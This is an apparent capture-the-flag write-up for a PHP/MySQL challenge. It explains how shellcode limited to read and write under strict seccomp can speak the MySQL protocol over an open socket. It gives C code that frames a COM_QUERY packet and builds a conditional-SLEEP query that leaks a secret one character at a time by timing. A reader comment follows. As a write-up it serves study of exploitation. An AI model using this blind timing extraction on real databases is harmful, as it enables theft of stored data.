
The challenge consists of a simple PHP script that opens a MySQL connection and then feeds our input into a custom PHP extension, `shellme.so`.

The extension basically just executes `$_POST['shell']` as shellcode after switching the process into strict seccomp mode with [prctl](http://man7.org/linux/man-pages/man2/prctl.2.html)([PR_SET_SECCOMP = 22](https://elixir.bootlin.com/linux/v4.16.8/source/include/uapi/linux/prctl.h#L68), [SECCOMP_MODE_STRICT = 1](https://elixir.bootlin.com/linux/v4.1/source/include/uapi/linux/seccomp.h#L10)). In strict mode the kernel permits only four syscalls, `read`, `write`, `exit`, and `sigreturn`, and kills the process with SIGKILL on any other; the latter two aren't particularly useful here.

The goal is to read the flag from the already-open MySQL connection. To do this from shellcode, we need to do a little digging into the MySQL documentation to figure out how the [client/server protocol](https://dev.mysql.com/doc/dev/mysql-server/latest/PAGE_PROTOCOL.html) works, since the shellcode has to speak it directly over the socket with nothing but `read` and `write`. Unfortunately, the server kept returning HTTP 500 errors, so I was unable to have it write the flag straight back to me; instead, I wrote a SQL query that conditionally calls `SLEEP` and leaked the flag via timing.
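As an added illustration (this is not code from the original writeup or from the challenge), the following C program frames a query as a MySQL `COM_QUERY` packet and sends it with nothing but `write(2)`, which is the situation shellcode under strict seccomp is in. It also generates the conditional-`SLEEP` query for one character position and one guessed byte. The table and column names (`flag`/`flag`), the socket descriptor passed as `fd`, and the 5-second delay are assumptions, not details from the page.

```c
/*
 * Added example, not from the original writeup or the challenge binary.
 * Frames a SQL query as a MySQL COM_QUERY packet and sends it using only
 * write(2), which is what shellcode under strict seccomp is limited to.
 * Assumptions: the flag lives in column `flag` of table `flag`, the MySQL
 * socket descriptor is already known (fd), and a 5-second SLEEP stands out
 * clearly against normal latency.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define COM_QUERY 0x03 /* MySQL command byte: execute a text query */

/* MySQL packet framing: 3-byte little-endian payload length, 1-byte
 * sequence id (0 for the first packet of a command), then the payload
 * (command byte followed by the query text, no terminator).
 * Returns the number of bytes written into out, or 0 if the buffer is too
 * small or the query would need the multi-packet (>= 16 MiB) encoding. */
size_t build_com_query(const char *sql, unsigned char *out, size_t cap)
{
    size_t payload_len = 1 + strlen(sql);
    if (payload_len >= 0xFFFFFF || cap < 4 + payload_len)
        return 0;
    out[0] = (unsigned char)(payload_len & 0xFF);
    out[1] = (unsigned char)((payload_len >> 8) & 0xFF);
    out[2] = (unsigned char)((payload_len >> 16) & 0xFF);
    out[3] = 0;          /* sequence id */
    out[4] = COM_QUERY;
    memcpy(out + 5, sql, payload_len - 1);
    return 4 + payload_len;
}

/* Parse the 4-byte header of a server reply. The first payload byte then
 * distinguishes an OK packet (0x00) from an ERR packet (0xFF). */
uint32_t packet_payload_len(const unsigned char *hdr, uint8_t *seq)
{
    *seq = hdr[3];
    return (uint32_t)hdr[0] | ((uint32_t)hdr[1] << 8) | ((uint32_t)hdr[2] << 16);
}

/* Timing-oracle query for one (position, guess) pair: the server sleeps
 * only when the guessed byte matches. CHAR(n) avoids quoting the guess,
 * and BINARY keeps the comparison case-sensitive. Returns the query length
 * as snprintf does. */
int timing_query(char *buf, size_t cap, unsigned pos, unsigned char guess)
{
    return snprintf(buf, cap,
        "SELECT IF(BINARY SUBSTRING((SELECT flag FROM flag LIMIT 1),%u,1)=CHAR(%u),"
        "SLEEP(5),0)", pos, (unsigned)guess);
}

/* Send the whole packet using only write(2); handles short writes. */
int send_packet(int fd, const unsigned char *pkt, size_t len)
{
    size_t done = 0;
    while (done < len) {
        ssize_t n = write(fd, pkt + done, len - done);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        done += (size_t)n;
    }
    return 0;
}

int main(void)
{
    char sql[256];
    unsigned char pkt[512];
    timing_query(sql, sizeof sql, 1, 'C');
    size_t n = build_com_query(sql, pkt, sizeof pkt);
    /* Hex dump of the frame a client (or the shellcode) would write to the socket. */
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", pkt[i], (i + 1) % 16 ? " " : "\n");
    putchar('\n');
    return 0;
}
```

In the challenge setting the delay is observed by whoever issues the HTTP request: if the shellcode blocks in `read` waiting for the server's reply packet, a matching guess holds the HTTP response for the `SLEEP` duration, so no clock syscall is needed inside the sandbox.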

Read the full writeup in the original post: https://blog.vero.site/post/shellql
duck, May 14, 2018, 6:22 p.m.

The author mentions that even just loading the `shellme.so` library in PHP would segfault. I finally got around that by installing PHP-CPP. (I still didn't manage to solve the challenge, though.)